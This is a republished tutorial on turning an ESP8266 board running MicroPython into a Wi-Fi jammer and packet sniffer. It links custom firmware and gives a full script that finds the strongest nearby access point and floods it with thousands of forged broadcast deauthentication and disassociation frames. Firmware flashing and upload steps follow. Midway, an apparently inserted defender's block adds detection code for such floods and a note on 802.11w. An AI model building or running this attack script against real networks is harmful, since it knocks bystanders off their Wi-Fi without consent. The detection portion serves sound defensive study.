How to implement Wi-Fi interference and packet capture with MicroPython

2025-03-26 Update From: SLTechnology News&Howtos shulou

Shulou(Shulou.com)06/02 Report--

This article introduces how to implement Wi-Fi interference and packet capture with MicroPython. Many people have questions about this in day-to-day work, so the author consulted various sources and sorted out a simple, easy-to-follow procedure.

0x01 Implementation Principle

a) From consulting references and analyzing the Arduino source code, we know that the attack works by sending IEEE 802.11 deauthentication packets: self-defined, forged deauth packets built according to the MAC-layer frame format.

b) The wifi_send_pkt_freedom function in the ESP8266 SDK is called to send the attack packet.

0x02 Attack Concept

a) Nearby APs are scanned when the program starts.

b) Find the AP with the strongest signal and obtain its MAC address (bssid) and channel.

c) Switch the TPYBoardv202 to the same channel as the AP being attacked.

d) Using the MAC address of the AP being attacked, assemble and send a deauth packet.

0x03 Compile and burn firmware and program source code

1. Compile firmware

The existing micropython-esp8266 firmware has no wifi_send_pkt_freedom function, so I compiled the firmware myself. Address:

https://github.com/PakchoiFood/micropython-deauth

You can download it and flash it yourself. If you want to compile and modify the firmware yourself, refer to:

https://github.com/micropython/micropython/tree/master/esp8266

Note: when compiling esp8266-sdk, the version must be 1.3.0; otherwise the wifi_send_pkt_freedom function will always return -1 (failure).

After downloading and extracting, the files are as follows:

firmware.bin: firmware generated from micropython-esp8266, with the following functions added:

setAttack function

Parameter: int (channel)

Function: sets the ESP8266 channel

send_pkt_freedom function

Parameter: bytes array (the defined packet)

flash_download_tools_v3.3.6_win.rar: tool for burning the firmware.

MicroPython FileUploader.rar: tool for downloading programs to the TPYBoardv202 flash.

main.py: program source file; it scans nearby APs, assembles the packets and calls the send function.

import time
import uos
import wireless

sta_if=wireless.attack(0)#0: STA mode
sta_if.active(True)
ap_list=sta_if.scan()
print(ap_list)
ssid=''
bssid=''#bssid: AP MAC address
channel=''#channel
_client=[0xFF, 0xFF]#default

def deauth(_ap,_client,type,reason):
    # 0 - 1 type, subtype c0: deauth (a0: disassociate)
    # 2 - 3 duration (SDK takes care of that)
    # 4 - 9 receiver (target)
    # 10 - 15 source (ap)
    # 16 - 21 BSSID (ap)
    # 22 - 23 fragment & sequence number
    # 24 - 25 reason code (1 = unspecified reason)
    packet=bytearray([0xC0,0x00,0x00,0x00,0xBB,0xBB,0xBB,0xBB,0xBB,0xBB,0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,0x00, 0x00,0x01, 0x00])
    for i in range(0,6):
        packet[4 + i] =_client[i]
        packet[10 + i] = packet[16 + i] =_ap[i]
    #set type
    packet[0] = type;
    packet[24] = reason
    result=sta_if.send_pkt_freedom(packet)
    if result==0:
        time.sleep_ms(1)
        return True
    else:
        return False

if __name__=="__main__":
    max_rssid=0
    max_id=0
    num=0
    #Get the AP with the strongest signal to attack
    for i in ap_list:
        if max_rssid==0:
            max_rssid=i[3]#rssid
        else:
            if i[3]>max_rssid:
                max_rssid=i[3]
                max_id=num
        num+=1
    ssid=ap_list[max_id][0]
    bssid=ap_list[max_id][1]
    channel=ap_list[max_id][2]
    print('ssid:',ssid,'-bssid:',bssid)
    print('-channel:',channel,'-rssid:',max_rssid)
    sendNum=5000#Number of attacks
    print('******************************')
    if sta_if.setAttack(channel):
        print('Set Attack OK')
        time.sleep_ms(100)
        print('---deauth runing-----')
        for i in range(0,sendNum):
            r_=deauth(bssid, _client, 0xC0, 0x01)
            if r_:
                deauth(bssid, _client, 0xA0, 0x01)
                deauth(_client, bssid, 0xC0, 0x01)
                deauth(_client, bssid, 0xA0, 0x01)
                time.sleep_ms(5)
            else:
                print('---deauth fail-------')
                time.sleep_ms(5000)
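
For defenders, the frame layout in the comments above is also what a detector keys on. The following added example (not code from the original article or from the firmware project) parses already-captured 802.11 frames offline and flags bursts of deauthentication/disassociation frames per BSSID; the function names, the window and threshold values and the sample MAC addresses are assumptions made for illustration, and frames are assumed to start at the 802.11 header.

```python
from collections import defaultdict
DEAUTH, DISASSOC = 0xC0, 0xA0          # byte 0 values from the frame layout above
BROADCAST = b"\xff" * 6

def parse_mgmt(frame):
    """Return a dict for a deauth/disassoc frame, or None for anything else."""
    if len(frame) < 26 or frame[0] not in (DEAUTH, DISASSOC):
        return None
    return {
        "kind": "deauth" if frame[0] == DEAUTH else "disassoc",
        "receiver": bytes(frame[4:10]),                     # bytes 4-9
        "source": bytes(frame[10:16]),                      # bytes 10-15
        "bssid": bytes(frame[16:22]),                       # bytes 16-21
        "reason": int.from_bytes(frame[24:26], "little"),   # bytes 24-25
    }

def detect_floods(capture, window=1.0, threshold=10):
    """capture: iterable of (timestamp_seconds, raw_frame_bytes). Returns one alert per
    BSSID with at least `threshold` deauth/disassoc frames in any `window`-second span."""
    seen = defaultdict(list)
    for ts, frame in capture:
        info = parse_mgmt(frame)
        if info:
            seen[info["bssid"]].append((ts, info))
    alerts = []
    for bssid, events in seen.items():
        events.sort(key=lambda e: e[0])
        start = 0
        for end, (ts, _) in enumerate(events):
            while ts - events[start][0] > window:   # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                burst = [i for _, i in events[start:end + 1]]
                alerts.append({
                    "bssid": ":".join("%02x" % b for b in bssid),
                    "count": len(burst),
                    "broadcast": any(i["receiver"] == BROADCAST for i in burst),
                    "reasons": sorted({i["reason"] for i in burst}),
                })
                break
    return alerts

def sample_frame(kind, receiver, source, reason=1):
    """Constructed 26-byte test frame in the layout above (not captured traffic)."""
    return bytes([kind, 0, 0, 0]) + receiver + source + source + bytes([0, 0, reason, 0])

AP, STA = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")  # constructed MACs
CAPTURE = [(0.0, sample_frame(DEAUTH, STA, AP, 3))] + [  # one ordinary deauth, then a burst
    (5.0 + 0.01 * n, sample_frame((DEAUTH, DISASSOC)[n % 2], BROADCAST, AP)) for n in range(40)]
```

A single deauthentication frame is normal traffic; the signal is the rate, especially when the receiver is the broadcast address. Networks that require Protected Management Frames (IEEE 802.11w) make clients discard unauthenticated deauthentication and disassociation frames.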

main.py under the sniffer folder implements the network packet capture function.

import wireless
import time

#can specify channels 1~13
sniffer=wireless.sniffer(6)
#0: indicates to switch channels starting from channel 1
#sniffer=wireless.sniffer(0)

Burn firmware

1. Connect the TPYBoardv202 to the computer with a micro-USB data cable. Open the computer's Device Manager and check the port assigned to the installed USB converter (COM57 here).

2. Unzip flash_download_tools_v3.3.6_win.rar, double-click to run ESPFlashDownloadTool_v3.3.6.exe.

3. Select the firmware.bin firmware file, set the address to 0x00000, and set the other parameters according to the following figure. I selected COM57; choose the port that matches your own setup. Set the baud rate to 115200.

4. Click [START]; the interface prompts that it is waiting for power-on synchronization. Hold down the FLASH key on the board and press the RST key to reset and power on again. The blank area on the left shows the MAC address that was read, and the status shows downloading. At this point, release the key.

5. Wait for the download to complete, then close the software.

Download program

6. Unzip MicroPythonFileUploader.rar and double-click to run MicroPythonFileUploader.exe.

This software requires .NET Framework 4.2 or above. If it fails to open, install .NET Framework before using it.

.NET Framework 4.5 download address: http://www.tpyboard.com/download/drive/174.html

7. Select COM57 and click [Open] to open the serial port.

8. Click the folder icon button on the right and select the main.py file.

9. Click Send to send the program to TPYBoardv202. After successful transmission, the program runs automatically.

10. Next, download main.py under the sniffer folder to the board in the same way. (The existing file will be overwritten.)

Open a serial assistant and you can see the packet data captured by the ESP8266.

This concludes the walkthrough of Wi-Fi interference and packet capture with MicroPython.
